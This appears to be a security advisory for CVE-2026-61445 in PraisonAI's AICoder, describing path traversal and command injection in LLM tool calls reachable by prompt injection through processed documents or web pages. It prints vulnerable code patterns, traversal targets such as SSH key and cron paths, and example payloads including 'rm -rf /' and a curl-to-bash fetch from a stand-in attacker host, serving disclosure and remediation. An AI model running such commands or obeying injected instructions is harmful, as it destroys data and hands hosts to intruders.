Overview
CVE-2026-61445 is a near-maximum-severity (CVSS 9.9) vulnerability in the AICoder component of PraisonAI. Two closely related weaknesses combine to allow a threat actor to fully compromise the host system:
- Arbitrary file write via missing path validation in LLM tool calls — enabling path traversal attacks that write files anywhere the process has write access.
- Command injection via unsanitized command strings passed to shell execution functions within LLM tool calls.
An attacker can exploit either flaw by injecting malicious instructions through the AICoder chat interface. Because AICoder is designed to take autonomous coding actions on behalf of the user, the LLM will faithfully execute attacker-supplied instructions when they are embedded in processed content.
Technical Details
Flaw 1: Arbitrary File Write (Path Traversal)
AICoder exposes file-writing tool calls to the LLM (e.g., write_file, save_code). The target path is taken directly from the LLM's output without canonicalization or jail-checking:
# Simplified vulnerable pattern
def write_file(path: str, content: str):
with open(path, "w") as f: # No realpath / chroot check
f.write(content)A prompt-injected payload can provide a path like ../../.ssh/authorized_keys or /etc/cron.d/backdoor, causing the agent to write attacker-controlled content to sensitive locations.
Flaw 2: Command Injection
AICoder also exposes shell execution tool calls (e.g., run_command, execute_shell) where the command string is constructed from LLM output without sanitization:
# Simplified vulnerable pattern
def run_command(cmd: str):
subprocess.run(cmd, shell=True) # shell=True + unsanitized inputUsing shell=True with unsanitized LLM output allows injection of shell metacharacters: ; rm -rf /, `curl attacker.com/shell.sh | bash`, and similar payloads.
Combined Exploitation Scenario
An attacker embedding a payload in a document, web page, or API response processed by AICoder could:
- Write a malicious cron job to
/etc/cron.d/for persistent execution. - Exfiltrate SSH keys, environment variables, or config files.
- Drop a reverse shell script and execute it via the command injection path.
- Overwrite application code to establish a persistent backdoor.
Affected Versions
| Product | Component | Affected | Fixed |
|---|---|---|---|
| PraisonAI | AICoder | < 4.6.78 | 4.6.78+ |
Remediation
Upgrade to PraisonAI 4.6.78 or later immediately. The fix introduces path canonicalization with a jail-root check for all file operations and removes shell=True from command execution in favour of argument list invocation with an explicit allow-list.
Interim mitigations if patching is not immediately feasible:
- Disable AICoder or any tool that grants the LLM file-write or shell-execution capabilities until the patch is applied.
- Run in a read-only container with a minimal filesystem and no network egress to limit the impact of exploitation.
- Apply strict AppArmor / seccomp profiles to constrain what the PraisonAI process can write and execute.
- Audit chat history and tool call logs for suspicious file paths or shell commands.
- Sanitize and validate all external content before feeding it to the AICoder context.
References
Timeline
| Date | Event |
|---|---|
| 2026-07-11 | NVD publication |
| 2026-07-12 | CosmicBytez Labs advisory published |